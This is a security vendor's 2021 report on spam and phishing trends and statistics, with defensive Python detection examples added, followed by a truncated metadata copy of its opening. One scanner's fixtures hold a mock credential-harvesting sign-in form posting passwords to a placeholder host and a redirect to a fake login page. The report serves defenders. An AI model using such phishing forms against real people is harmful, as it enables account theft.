
# Spam and phishing in 2021
## Figures of the year
In 2021:
* 45.56% of e-mails were spam
* 24.77% of spam was sent from Russia with another 14.12% from Germany
* Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
* Agensla Trojans were the most common malware family found in attachments
* Our Anti-Phishing system blocked 253 365 212 phishing links
* Safe Messaging blocked 341 954 attempts to follow phishing links in messengers
## Trends of the year
### How to make an unprofitable investment with no return
The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)
Similar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)
Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)
### Films and events "streamed" on fake sites: not seeing is believing!
Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)
However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content; the only difference was that visitors might not be able to watch anything at all without registering. Either way, the registration turned out not to be free. According to the information on the website, the registration fee was only a symbolic figure, but once the user had entered their bank card details, any amount of money could be debited, and the card details themselves immediately fell into the hands of the attackers.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)
### A special offer from cybercriminals: try your hand at spamming
More and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)
### Hurry up and lose your account: phishing in the corporate sector
The main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)
The fake notification would often concern undelivered messages, which supposedly had to be accessed via some sort of "email Portal" or a similar resource.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)
Another noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)
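The lures in this section share one shape: a business-looking notification, urgent wording, and a link whose real destination is an unrelated login page. Below is an added triage example (not Kaspersky code) that parses a raw e-mail, pulls the hyperlinks out of its HTML body and flags the two things a defender can check mechanically: link text that shows one domain while the href goes to another, and links that leave the sender's domain, combined with urgency phrasing. The two messages are constructed samples; all domains in them are placeholders.

```python
"""Triage helper for credential-phishing lures that mimic business notifications.
Added example, not the report's own tooling; sample messages are constructed."""
import re
from email import message_from_string
from email.message import Message
from html.parser import HTMLParser
from urllib.parse import urlparse

# Urgency phrasing typical of the lures described above (assumed list).
URGENCY_WORDS = ("urgent", "immediately", "action required", "expires", "undelivered", "approval")


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host: str) -> str:
    """Crude registrable domain: the last two labels. Fine for .com/.net style
    hosts; ccSLDs such as .co.uk would need a public-suffix list (assumption)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def _html_body(msg: Message) -> str:
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True)
            return raw.decode(part.get_content_charset() or "utf-8", "replace")
    return ""


def triage(raw: str) -> dict:
    """Returns the sender domain, the links found and a list of findings."""
    msg = message_from_string(raw)
    m = re.search(r"@([\w.-]+)", msg.get("From", ""))
    sender_domain = registrable(m.group(1)) if m else ""
    body = _html_body(msg)
    collector = _LinkCollector()
    collector.feed(body)
    findings = []
    for href, text in collector.links:
        link_domain = registrable(urlparse(href).hostname or "")
        # Visible text that looks like a URL but resolves elsewhere.
        if re.match(r"https?://", text):
            shown = registrable(urlparse(text).hostname or "")
            if shown and shown != link_domain:
                findings.append(f"link text shows {shown} but href goes to {link_domain}")
        if sender_domain and link_domain and link_domain != sender_domain:
            findings.append(f"link to {link_domain} does not match sender domain {sender_domain}")
    haystack = (msg.get("Subject", "") + " " + body).lower()
    hits = [w for w in URGENCY_WORDS if w in haystack]
    if hits and findings:
        findings.append("urgency wording combined with off-domain link: " + ", ".join(hits))
    return {"sender_domain": sender_domain, "links": collector.links, "findings": findings}


# Constructed lure: fake SharePoint notification with a disguised login link.
PHISH = """\
From: "SharePoint Online" <no-reply@sharepoint-notify.example>
To: jane.doe@corp.example
Subject: Action required: salary approval document shared with you
Content-Type: text/html; charset=utf-8

<html><body>
<p>A document requires your urgent approval.</p>
<p><a href="https://corp-login.example.net/auth">https://corp.example/sharepoint/docs</a></p>
</body></html>
"""

# Constructed benign message: internal sender, link stays on the company domain.
BENIGN = """\
From: "HR Team" <hr@corp.example>
To: jane.doe@corp.example
Subject: Holiday schedule for next year
Content-Type: text/html; charset=utf-8

<html><body><p>See the <a href="https://intranet.corp.example/holidays">holiday calendar</a>.</p></body></html>
"""

if __name__ == "__main__":
    for name, sample in (("phish", PHISH), ("benign", BENIGN)):
        print(name, triage(sample)["findings"])
```

The domain comparison is deliberately coarse: the point is to surface the mismatch between what the recipient is shown and where the link really goes, which is exactly the gap these lures exploit. A production filter would swap `registrable()` for a public-suffix-list lookup and add allow-listing for legitimate third-party notification senders.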
### COVID-19
#### Scams
The subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)
The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)
#### The corporate sector
COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)
Another malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)
The "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)
Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work, accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment containing the malicious object as quickly as possible.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)
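The "Covid Test Result" attachment above is an HTML file that, once opened, either presents a fake sign-in form or forwards the victim to one. As an added example (not Kaspersky's detection logic), the scanner below walks the attachments of a raw message, parses any HTML file and reports two tell-tale structures: a form containing a password field, together with the host its `action` posts to, and a `<meta http-equiv="refresh">` redirect. The messages and hostnames are constructed with Python's `email` library for the demonstration.

```python
"""Scanner for HTML e-mail attachments that act as credential forms or redirectors.
Added example, not the report's own tooling; all samples are constructed."""
import re
from email import policy
from email.message import EmailMessage
from email.parser import Parser
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Records password-collecting forms and meta-refresh redirects."""

    def __init__(self):
        super().__init__()
        self.findings = []          # (kind, target host)
        self._form_action = None
        self._form_has_password = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)             # HTMLParser lowercases attribute names
        if tag == "form":
            self._form_action = a.get("action") or ""
            self._form_has_password = False
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self._form_has_password = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content") or "", re.I)
            if m:
                self.findings.append(("meta-refresh", urlparse(m.group(1)).hostname or ""))

    def handle_endtag(self, tag):
        if tag == "form" and self._form_action is not None:
            if self._form_has_password:
                host = urlparse(self._form_action).hostname or "(local)"
                self.findings.append(("password-form", host))
            self._form_action = None


def scan_html_attachments(raw: str) -> list:
    """Returns (filename, kind, target host) triples for suspicious HTML attachments."""
    msg = Parser(policy=policy.default).parsestr(raw)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        scanner = _FormScanner()
        scanner.feed(part.get_content())
        results.extend((name, kind, host) for kind, host in scanner.findings)
    return results


def build_sample(filename: str, html: str) -> str:
    """Constructs a raw multipart message carrying one HTML attachment (sample only)."""
    msg = EmailMessage()
    msg["From"] = "Health Desk <results@lab-notify.example>"   # constructed sender
    msg["To"] = "employee@corp.example"
    msg["Subject"] = "Your test result"
    msg.set_content("Please open the attached result.")
    msg.add_attachment(html, subtype="html", filename=filename)
    return msg.as_string()


# Constructed lure: a sign-in form that posts credentials to a placeholder host.
LURE_HTML = """<html><body><h2>Sign in to view your result</h2>
<form method="post" action="https://account-verify.example.net/collect">
  <input name="login" type="email"><input name="pwd" type="password"><button>Sign in</button>
</form></body></html>"""

# Constructed redirector: no form locally, just bounces the browser to a placeholder host.
REDIRECT_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=https://login-portal.example.org/ms">
</head><body>Loading...</body></html>"""

# Constructed benign attachment: a static report with no form and no redirect.
REPORT_HTML = "<html><body><h1>Test result</h1><p>Negative.</p></body></html>"


def demo():
    lure = scan_html_attachments(build_sample("Covid Test Result.html", LURE_HTML))
    redirect = scan_html_attachments(build_sample("result.html", REDIRECT_HTML))
    benign = scan_html_attachments(build_sample("report.html", REPORT_HTML))
    return lure, redirect, benign


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

Both patterns are cheap to check at the mail gateway and need no network access, which is what makes them useful as a first-pass filter before sandboxing. Obfuscated JavaScript redirects (`location.href` assembled at runtime) will not be caught by this parser; those need script emulation or a rendering sandbox.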
#### COVID-19 vaccination
While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)
In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)
Another way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)
The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)
We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)
## Statistics: spam
### Share of spam in mail traffic
On average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.
_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_
We observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.
### Source of spam by country or region
Like in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.
_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_
The Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.
### Malicious mail attachments
_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_
In 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.
#### Malware families
The attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same share of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (3.93%), whose members create malicious tasks in Windows Task Scheduler.
_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_
The fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.
_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_
The ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.
#### Countries and regions targeted by malicious mailings
In 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).
_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_
Germany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).
## Statistics: phishing
In 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.
### Map of phishing attacks
_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_
Users living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.
Mongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).
TOP 10 countries by share of users targeted in phishing attacks:
**Country** | **Share of attacked users***
---|---
Brazil | 12.39%
France | 12.21%
Portugal | 11.40%
Mongolia | 10.98%
Réunion | 10.97%
Brunei | 10.89%
Madagascar | 10.87%
Andorra | 10.79%
Australia | 10.74%
Ecuador | 10.73%
_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_
### Top-level domains
As in 2020, most of the phishing websites blocked in 2021 used a .com domain name; its share rose 7.19 p.p. to 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.
_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_
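A ranking like the one above is produced by tallying the top-level domain of every blocked link. The added example below (not the report's own pipeline) does that over a constructed list of placeholder URLs, skipping entries that have no TLD at all (bare IP addresses, which phishing kits also use) so they do not distort the percentages; hostnames are already lower-cased and, for IDNs, punycode-encoded by `urlparse`, so the label comparison is stable.

```python
"""Top-level-domain breakdown of blocked phishing links.
Added example, not the report's own statistics code; the URL list is constructed."""
from collections import Counter
from typing import Iterable, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample of blocked links; placeholder domains, not real IoCs.
BLOCKED = [
    "https://secure-login.example.com/verify",
    "http://mail-portal.example.com/inbox",
    "https://docs-share.example.com/approve",
    "https://account.Example.COM/reset",        # mixed case: normalised below
    "http://prize-draw.example.xyz/win",
    "http://survey-gift.example.xyz/claim",
    "https://pay-update.example.cn/login",
    "https://bonus.example.ru/invest",
    "http://stream-free.example.tk/watch",
    "http://192.0.2.10/login.php",              # bare IPv4: no TLD, excluded
]


def tld_of(url: str) -> Optional[str]:
    """Returns the last DNS label of the URL's host, or None when there is none."""
    host = (urlparse(url).hostname or "").rstrip(".")
    if not host or "." not in host:
        return None                      # empty host or IPv6 literal
    if host.replace(".", "").isdigit():
        return None                      # bare IPv4 address
    return host.rsplit(".", 1)[-1].lower()


def tld_shares(urls: Iterable[str], top: int = 10) -> List[Tuple[str, int, float]]:
    """Returns (tld, count, percent) for the most common TLDs among the given URLs."""
    counts = Counter(t for t in map(tld_of, urls) if t)
    total = sum(counts.values())
    if total == 0:
        return []
    return [(tld, n, round(100.0 * n / total, 2)) for tld, n in counts.most_common(top)]


if __name__ == "__main__":
    for tld, n, pct in tld_shares(BLOCKED):
        print(f".{tld:<8}{n:>4}{pct:>8.2f}%")
```

Note that this counts the rightmost label only, so `.co.uk` and `.uk` both land under "uk"; the report's ranking is at the same granularity (.com, .xyz, .cn), which is why the simple split is enough here.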
### Organizations mimicked in phishing attacks
_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._
The demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.
_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_
### Phishing in messengers
_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._
In 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.
_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_
On average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We also observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. Another brief surge in phishing activity occurred in the week from October 31 through November 6, 2021.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)
**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**
On average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)
**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**
A daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)
**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**
## Conclusion
As we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes, which remained two of the year's main themes, were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and used similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.
The key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.
{"id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "vendorId": null, "type": "securelist", "bulletinFamily": "blog", "title": "Spam and phishing in 2021", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. 
In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the 